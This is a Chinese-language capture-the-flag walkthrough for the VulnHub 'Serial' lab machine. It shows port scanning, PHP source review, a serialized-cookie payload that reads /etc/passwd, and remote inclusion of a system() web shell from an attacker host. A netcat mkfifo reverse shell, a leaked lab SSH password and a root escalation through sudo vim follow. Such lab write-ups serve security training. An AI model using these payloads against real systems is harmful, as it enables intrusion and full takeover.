vulnhub-serile靶机通关攻略

下载地址：https://www.vulnhub.com/entry/serial-1,349/

靶机安装特殊，附带安装参考文章：https://zhuanlan.zhihu.com/p/113887109

扫描IP地址

arp-scan -l

扫描端口

nmap -p- 192.168.112.141

访问80端口

线索指向cookie

cookie是base64编码的，解码查看

是一串反序列化的代码

没有头绪

扫描目录

存在backup目录（敏感目录）

访问一下

里面有一个压缩包

下载解压后，有三个php文件

通过代码审计得知，首先index.php文件包含了user.class.php文件，对cookie中的user参数进行了序列化和base64编码，然后user.class.php文件包含了log.class.php，且定义了两个类，分别是Welcome和User，并调用了log.class.php文件中的handle函数。log.class.php文件又定义了Log类和成员变量type_log，且handler函数对变量还进行了文件包含和输出

那我们可以尝试构造payload

尝试读取password文件

因为我们一开始获取的反序列化实在网站的cookie上获取的，所以到了这一步，我们发现，访问80端口将线索指向cookie就是让我们将payload从cookie上传，所以我们要抓包

因为index.php中将cookie的信息进行了base64编码，所以我们上传的也要是经过base64编码过的

<?php 
    class Log { 
        private $type_log = "/etc/passwd"; 
    } 
    class User {
        private $name = "admin"; 
        private $wel; function __construct() {
        $this->wel = new Log(); 
        }
    }
$obj = new User();
echo base64_encode(serialize($obj)); 

成功访问到passwd文件，所以我们可以上传一句话木马

<?php system($_GET['cmd']);?>
//木马使用system，并且必须用GET传参

<?php
 
    class Log {
     public $type_log = "http://192.168.88.88/zxin.txt";
    }
    class User {
         public $name;
         public $wel;
        function __construct($name) {
             $this->name = $name;
             $this->wel = new Log();
        }
    }
    $us = new User("sk4");
    print_r(serialize($us));
?>

O:4:"User":2:{s:4:"name";s:3:"sk4";s:3:"wel";O:3:"Log":1:{s:8:"type_log";s:29:"http://192.168.88.88/zxin.txt";}}

Tzo0OiJVc2VyIjoyOntzOjQ6Im5hbWUiO3M6Mzoic2s0IjtzOjM6IndlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6Mjk6Imh0dHA6Ly8xOTIuMTY4Ljg4Ljg4L3p4aW4udHh0Ijt9fQ==

成功写入

接下来反弹shell，将反弹payload放在cmd参数位置，kali进行监听

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.112.132+9999+>/tmp/f

成功反弹shell

来到根目录ls查看文件，发现一个bak备份文件

cat查看是用户名 密码

用户名：sk4

密码：KywZmnPWW6tTbW5w

使用ssh进行登录

成功连接

提权

查看一下sudo授权

发现vim可以利用

sudo vim进入，esc进入编辑模式

输入！/bin/bash

成功提权

来到家目录，ls可以看到flag